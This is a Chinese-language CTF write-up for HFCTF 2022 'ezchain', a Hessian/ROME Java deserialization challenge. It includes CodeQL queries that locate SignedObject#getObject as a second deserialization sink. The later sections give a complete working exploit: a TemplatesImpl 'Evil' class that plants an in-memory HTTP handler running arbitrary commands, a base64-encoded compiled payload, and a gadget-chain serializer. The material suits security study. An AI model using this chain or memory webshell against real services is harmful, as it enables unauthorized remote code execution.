2022HFCTF-ezchain

  1. 1. 前言
  2. 2. 分析
  3. 3. codeql寻找
    1. 3.1. jdk建库
    2. 3.2. 编写
      1. 3.2.1. 第一版
      2. 3.2.2. 第二版
  4. 4. 回显问题

前言

比赛的时候没做出来,赛后复现了,隔了这么久想写一篇笔记顺便练习一下codeql

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
public class Index {
public static void main(String[] args) throws Exception {
System.out.println("server start");
HttpServer server = HttpServer.create(new InetSocketAddress(8090), 0);
server.createContext("/", new MyHandler());
server.setExecutor(Executors.newCachedThreadPool());
server.start();
}

static class MyHandler implements HttpHandler {
public void handle(HttpExchange t) throws IOException {
String query = t.getRequestURI().getQuery();
Map<String, String> queryMap = queryToMap(query);
String response = "Welcome to HFCTF 2022";
if (queryMap != null) {
String token = queryMap.get("token");
String secret = "HFCTF2022";
if (Objects.hashCode(token) == secret.hashCode() && !secret.equals(token)) {
InputStream is = t.getRequestBody();
try {
Hessian2Input input = new Hessian2Input(is);
input.readObject();
} catch (Exception e) {
response = "oops! something is wrong";
}
} else {
response = "your token is wrong";
}
}
t.sendResponseHeaders(200, response.length());
OutputStream os = t.getResponseBody();
os.write(response.getBytes());
os.close();
}

public Map<String, String> queryToMap(String query) {
if (query == null)
return null;
Map<String, String> result = new HashMap<>();
for (String param : query.split("&")) {
String[] entry = param.split("=");
if (entry.length > 1) {
result.put(entry[0], entry[1]);
} else {
result.put(entry[0], "");
}
}
return result;
}
}
}

Hessian+rome的反序列化

网上公开的hessan+rome最后是进行jndi注入的,但题目设置了不出网,所以不能利用。

rome原本的加载字节码的链子也是不能用,因为修饰符是transient,Hessian的反序列化并不会调用类的readObject方法对其恢复。

所以根据rome链终点的特性,找合适的setter或者getter方法。最后找到的是

java.security.SignedObject#getObject

1649578618039.png

里面有个原生的反序列化。

codeql寻找

想练习一下codeql,知道终点之后只要写对规则就行了

jdk建库

关于这个问题,实际上就是编译jdk的过程,只不过最后的步骤从编译jdk变成建codeql库,所以按照网上不同系统如何编译jdk的过程来就行了,最后一步编译jdk的时候在用codeql建库

编写

第一版

先来一个简单的版本,单纯从语法结构上来分析

前面说了终点是

java.security.SignedObject#getObject

rome终点的特点就是调用无参的setter、getter和is方法

所以要求

1.get或set或is开头,无参数

2.调用readObject

最终:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import java

class TargetMethod extends Method{
TargetMethod(){
this.fromSource() and
this.hasNoParameters() and
this.isPublic() and
this .getName().length() > 3 and
(
this.getName().indexOf("get") = 0 or
this.getName().indexOf("set") = 0 or
this.getName().indexOf("is") = 0
)
}
}

from MethodAccess ma, Method me, TargetMethod tm

where
me = ma.getMethod() and
ma.getEnclosingStmt() = tm.getBody().getAChild*() and
me.hasName("readObject")
select tm,me

1649684667181.png

第二版

想试着用污点追踪找找看,准备简单定义一下,sink就是readObject

先写一下sink吧

readObject一般都是 a.readObject()的形式调用

所以sink这么写

1
2
3
4
5
6
7
override predicate isSink(DataFlow::Node sink) {
exists(Call call ,Callable parseExpression|
sink.asExpr() = call.getQualifier() and
call.getCallee()=parseExpression and
parseExpression.hasName("readObject")
)
}

接着是source,不知道怎么很好的去定义,暂时定义为ByteArrayInputStream方法,并且参数为成员变量,这里偷懒就找以this开头的

刚接触codeql不久。写的挺烂的,有点误报但还是能找到,就当练一下手吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/**
* @kind path-problem
*/
import java
import semmle.code.java.frameworks.spring.SpringController
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph
import semmle.code.java.dataflow.FlowSources

class ByteArrayInputStreamContruct extends ClassInstanceExpr{
ByteArrayInputStreamContruct(){
this.getConstructor().getDeclaringType*().hasQualifiedName("java.io", "ByteArrayInputStream")
}
}

class Configuration extends TaintTracking::Configuration {
Configuration() {
this = "Configer"
}

override predicate isSource(DataFlow::Node source) {
exists(
ByteArrayInputStreamContruct bc |
source.asExpr() = bc.getAnArgument() and
bc.getAnArgument().toString().indexOf("this") = 0
)
}

override predicate isSink(DataFlow::Node sink) {
exists(Call call ,Callable parseExpression|
sink.asExpr() = call.getQualifier() and
call.getCallee()=parseExpression and
parseExpression.hasName("readObject")
)
}

}

from DataFlow::PathNode src, DataFlow::PathNode sink, Configuration config
where config.hasFlowPath(src, sink)
select sink.getNode(), src, sink, "source are"

1649748462756.png

这里想减少误报就定义一下isAdditionalTaintStep吧。

回显问题

现在能任意原生反序列化了,因为不出网所以最后得解决回显问题。这里借鉴feng师傅的

1649748988560.png

所以恶意类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
package HFCTF;

import com.sun.net.httpserver.HttpContext;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;


public class Evil extends AbstractTranslet implements HttpHandler{
public Evil() throws Exception{
super();
try {
Object obj = Thread.currentThread();
Field field = obj.getClass().getDeclaredField("group");
field.setAccessible(true);
obj = field.get(obj);

field = obj.getClass().getDeclaredField("threads");
field.setAccessible(true);
obj = field.get(obj);
Thread[] threads = (Thread[]) obj;
for (Thread thread : threads) {
if (thread.getName().contains("Thread-2")) {
try {
field = thread.getClass().getDeclaredField("target");
field.setAccessible(true);
obj = field.get(thread);


field = obj.getClass().getDeclaredField("this$0");
field.setAccessible(true);
obj = field.get(obj);




Method createContext = obj.getClass().getMethod("createContext",String.class,HttpHandler.class);
createContext.setAccessible(true);
System.out.println(123);

createContext.invoke(obj,"/fmyyy",this);
System.out.println(456);

}catch (Exception e){
System.out.println(e.toString());
e.printStackTrace();
}
}

}

} catch (Exception e) {
e.printStackTrace();
}
}


@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}

@Override
public void handle(HttpExchange t) throws IOException {
String response = "";
String query = t.getRequestURI().getQuery();
String[] var3 = query.split("=");
System.out.println(var3[0]+var3[1]);
ByteArrayOutputStream output = null;
if (var3[0].equals("cmd")){
InputStream inputStream = Runtime.getRuntime().exec(var3[1]).getInputStream();
output = new ByteArrayOutputStream();
byte[] buffer = new byte[4096];
int n = 0;
while (-1 != (n = inputStream.read(buffer))) {
output.write(buffer, 0, n);
}
}
response+=("\n"+new String(output.toByteArray()));
t.sendResponseHeaders(200, (long)response.length());
OutputStream os = t.getResponseBody();
os.write(response.getBytes());
os.close();
}



}

所以最后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package HFCTF;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Field;
import java.security.*;
import java.util.Base64;
import java.util.HashMap;

import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.HessianOutput;
import com.rometools.rome.feed.impl.EqualsBean;
import com.rometools.rome.feed.impl.ObjectBean;
import com.rometools.rome.feed.impl.ToStringBean;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;


public class exp {

public static <T> byte[] He2serialize(T javaBean) throws Exception {
Hessian2Output ho = null;
ByteArrayOutputStream baos = null;

try {
baos = new ByteArrayOutputStream();
ho = new Hessian2Output(baos);
ho.writeObject(javaBean);
ho.flush();
return baos.toByteArray();
} catch (Exception ex) {
System.out.println("[模拟日志记录]HessianUtils.serialize.异常." + ex.getMessage());
throw new Exception("HessianUtils.serialize.异常.", ex);
} finally {
if (null != ho) {
ho.close();
}
}
}

public static void setFieldValue(Object obj, String fieldName, Object
value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception {
byte[] payload = Base64.getDecoder().decode("yv66vgAAADQBAAoAOgB+CgB/AIAKABcAgQgAggoAEACDCgCEAIUKAIQAhggASgcASwoAfwCHCACICgARAIkIAIoIAIsIAEAHAIwHAI0HAI4KABAAjwoAkACFCQCRAJIKAJMAlAcAlQgAlgoAkACXBwCYCgAaAJkKAJMAmgoAGgCbCACcCgCdAJ4KAJ8AoAgAoQoAEQCiBwCjCgAjAH4KACMApAoAIwCZCAClCgARAKYKAKcAqAoApwCpCgCqAKsHAKwKACwAfgoArQCuCgAsAK8IALAKACwAsQoAEQCyCgARALMKAJ0AtAoAnQC1CgARALYKALcAuAoAtwC5BwC6BwC7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEADWNyZWF0ZUNvbnRleHQBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEABHRoaXMBAAxMSEZDVEYvRXZpbDsBAA1TdGFja01hcFRhYmxlBwC6BwCVBwC8BwC9BwCYAQAKRXhjZXB0aW9ucwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAL4BABBNZXRob2RQYXJhbWV0ZXJzAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAZoYW5kbGUBACgoTGNvbS9zdW4vbmV0L2h0dHBzZXJ2ZXIvSHR0cEV4Y2hhbmdlOylWAQALaW5wdXRTdHJlYW0BABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAAZidWZmZXIBAAJbQgEAAW4BAAFJAQABdAEAJUxjb20vc3VuL25ldC9odHRwc2VydmVyL0h0dHBFeGNoYW5nZTsBAAhyZXNwb25zZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABXF1ZXJ5AQAEdmFyMwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAZvdXRwdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACb3MBABZMamF2YS9pby9PdXRwdXRTdHJlYW07BwC/BwCNBwBwBwCsBwDABwBnBwDBAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwAOwA8BwC9DADCAMMMAMQAxQEABWdyb3VwDADGAMcHALwMAMgAyQwAygDLDADMAM0BAAhUaHJlYWQtMgwAzgDPAQAGdGFyZ2V0AQAGdGhpcyQwAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL1N0cmluZwEAImNvbS9zdW4vbmV0L2h0dHBzZXJ2ZXIvSHR0cEhhbmRsZXIMANAA0QcA0gcA0wwA1ADVBwDWDADXANgBABBqYXZhL2xhbmcvT2JqZWN0AQAGL2ZteXl5DADZANoBABNqYXZhL2xhbmcvRXhjZXB0aW9uDADbAM0MANcA3AwA3QA8AQAABwC/DADeAN8HAOAMAOEAzQEAAT0MAOIA4wEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDADkAOUBAANjbWQMAOYA5wcA6AwA6QDqDADrAOwHAO0MAO4A7wEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwDADADwAPEMAPIA8wEAAQoMAPQA9QwAOwD2DAD3APgMAPkA+gwA+wD8DAD9APUHAP4MAPIA9gwA/wA8AQAKSEZDVEYvRXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEAEGphdmEvbGFuZy9UaHJlYWQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BACNjb20vc3VuL25ldC9odHRwc2VydmVyL0h0dHBFeGNoYW5nZQEAE2phdmEvaW8vSW5wdXRTdHJlYW0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BAAQoSSlWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIdG9TdHJpbmcBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAA1nZXRSZXF1ZXN0VVJJAQAQKClMamF2YS9uZXQvVVJJOwEADGphdmEvbmV0L1VSSQEACGdldFF1ZXJ5AQAFc3BsaXQBACcoTGphdmEvbGFuZy9TdHJpbmc7KVtMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAFKFtCKVYBAAZsZW5ndGgBAAMoKUkBABNzZW5kUmVzcG9uc2VIZWFkZXJzAQAFKElKKVYBAA9nZXRSZXNwb25zZUJvZHkBABgoKUxqYXZhL2lvL091dHB1dFN0cmVhbTsBAAhnZXRCeXRlcwEAFGphdmEvaW8vT3V0cHV0U3RyZWFtAQAFY2xvc2UAIQA5ADoAAQASAAAABAABADsAPAACAD0AAAI8AAYACQAAAPQqtwABuAACTCu2AAMSBLYABU0sBLYABiwrtgAHTCu2AAMSCLYABU0sBLYABiwrtgAHTCvAAAnAAAlOLToEGQS+NgUDNgYVBhUFogCiGQQVBjI6BxkHtgAKEgu2AAyZAIgZB7YAAxINtgAFTSwEtgAGLBkHtgAHTCu2AAMSDrYABU0sBLYABiwrtgAHTCu2AAMSDwW9ABBZAxIRU1kEEhJTtgATOggZCAS2ABSyABUQe7YAFhkIKwW9ABdZAxIYU1kEKlO2ABlXsgAVEQHItgAWpwAVOgiyABUZCLYAG7YAHBkItgAdhAYBp/9dpwAITCu2AB2xAAIAYADQANMAGgAEAOsA7gAaAAMAPgAAAH4AHwAAABcABAAZAAgAGgASABsAFwAcAB0AHgAnAB8ALAAgADIAIQA6ACIAUwAjAGAAJQBrACYAcAAnAHcAKgCBACsAhgAsAIwAMQClADIAqwAzALMANQDHADYA0AA7ANMAOADVADkA4AA6AOUAIgDrAEIA7gBAAO8AQQDzAEMAPwAAAFIACAClACsAQABBAAgA1QAQAEIAQwAIAFMAkgBEAEUABwAIAOMARgBHAAEAEgDZAEgASQACADoAsQBKAEsAAwDvAAQAQgBDAAEAAAD0AEwATQAAAE4AAABKAAb/AEUABwcATwcAUAcAUQcACQcACQEBAAD/AI0ACAcATwcAUAcAUQcACQcACQEBBwBSAAEHAFP6ABH/AAUAAQcATwAAQgcAUwQAVAAAAAQAAQAaAAEAVQBWAAMAPQAAAD8AAAADAAAAAbEAAAACAD4AAAAGAAEAAABJAD8AAAAgAAMAAAABAEwATQAAAAAAAQBXAFgAAQAAAAEAWQBaAAIAVAAAAAQAAQBbAFwAAAAJAgBXAAAAWQAAAAEAVQBdAAMAPQAAAEkAAAAEAAAAAbEAAAACAD4AAAAGAAEAAABOAD8AAAAqAAQAAAABAEwATQAAAAAAAQBXAFgAAQAAAAEAXgBfAAIAAAABAGAAYQADAFQAAAAEAAEAWwBcAAAADQMAVwAAAF4AAABgAAAAAQBiAGMAAwA9AAABtAAEAAkAAADBEh5NK7YAH7YAIE4tEiG2ACI6BLIAFbsAI1m3ACQZBAMytgAlGQQEMrYAJbYAJrYAHAE6BRkEAzISJ7YAKJkAQLgAKRkEBDK2ACq2ACs6BrsALFm3AC06BREQALwIOgcDNggCGQYZB7YALlk2CJ8AEBkFGQcDFQi2AC+n/+i7ACNZtwAkLLYAJRIwtgAluwARWRkFtgAxtwAytgAltgAmTSsRAMgstgAzhbYANCu2ADU6BhkGLLYANrYANxkGtgA4sQAAAAMAPgAAAEoAEgAAAFIAAwBTAAsAVAATAFUAMQBWADQAVwBAAFgATwBZAFgAWgBfAFsAYgBcAHAAXQB9AGAAoABhAKwAYgCyAGMAuwBkAMAAZQA/AAAAZgAKAE8ALgBkAGUABgBfAB4AZgBnAAcAYgAbAGgAaQAIAAAAwQBMAE0AAAAAAMEAagBrAAEAAwC+AGwAbQACAAsAtgBuAG0AAwATAK4AbwBwAAQANACNAHEAcgAFALIADwBzAHQABgBOAAAAJQAC/wBiAAkHAE8HAHUHAHYHAHYHAHcHAHgHAHkHAHoBAAD4ABoAVAAAAAQAAQB7AFwAAAAFAQBqAAAAAQB8AAAAAgB9");
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates,"_bytecodes",new byte[][]{payload});
setFieldValue(templates,"_name","f");
//SerializeUtil.setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
ToStringBean toStringBean1 = new ToStringBean(Templates.class, templates);
EqualsBean equalsBean1 = new EqualsBean(ToStringBean.class, toStringBean1);
ObjectBean objectBean1 = new ObjectBean(String.class,"f");
HashMap evilMap1 = new HashMap();
evilMap1.put(objectBean1,1);
evilMap1.put(objectBean1,1);
setFieldValue(objectBean1,"equalsBean",equalsBean1);
//byte[] bytes = SerializeUtil.serialize(evilMap1);
Signature signature = Signature.getInstance("DSA");
KeyPairGenerator kg = KeyPairGenerator.getInstance("DSA");
kg.initialize(1024);
KeyPair kp = kg.genKeyPair();
SignedObject signedObject = new SignedObject(evilMap1,kp.getPrivate(),signature);


ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);
EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);



ObjectBean objectBean = new ObjectBean(String.class,"f");
HashMap evilMap = new HashMap();
evilMap.put(objectBean,1);
evilMap.put(objectBean,1);
setFieldValue(objectBean,"equalsBean",equalsBean);
byte[] serialize = He2serialize(evilMap);
System.out.println(Base64.getEncoder().encodeToString(serialize));
}
}